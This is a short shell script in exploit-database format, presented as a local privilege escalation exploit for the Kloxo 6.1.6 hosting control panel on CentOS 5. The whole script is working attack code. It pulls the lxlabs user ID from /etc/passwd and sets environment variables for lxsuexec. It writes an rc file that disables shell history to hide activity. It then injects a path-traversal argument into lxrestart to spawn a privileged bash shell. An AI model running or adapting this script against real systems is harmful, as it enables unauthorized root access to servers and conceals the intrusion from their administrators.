<code>#!/bin/sh</code>
<code># Exploit Title: Kloxo Local Privilege Escalation</code>
<code># Google Dork: inurl:kiddies</code>
<code># Date: August 2012 or so</code>
<code># Exploit Author: HTP</code>
<code># Vendor Homepage: http://lxcenter.org/</code>
<code># Software Link: [download link if available]</code>
<code># Version: 6.1.6 (Latest)</code>
<code># Tested on: CentOS 5</code>
<code># CVE : None</code>
<code># This exploit requires you to be the Apache user, or another capable of running lxsuexec.</code>
<code>LXLABS=`</code><code>cat</code>
<code>/etc/</code><code>passwd</code> <code>|</code><code>grep</code> <code>lxlabs |</code><code>cut</code> <code>-d: -f3`</code>
<code>export</code> <code>MUID=$LXLABS</code>
<code>export</code> <code>GID=$LXLABS</code>
<code>export</code> <code>TARGET=/bin/sh</code>
<code>export</code> <code>CHECK_GID=0</code>
<code>export</code> <code>NON_RESIDENT=1</code>
<code>echo</code> <code>"unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT"</code> <code>>> /tmp/w00trc</code>
<code>echo</code> <code>"/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' "</code> <code>> /tmp/lol</code>
<code>lxsuexec /tmp/lol</code>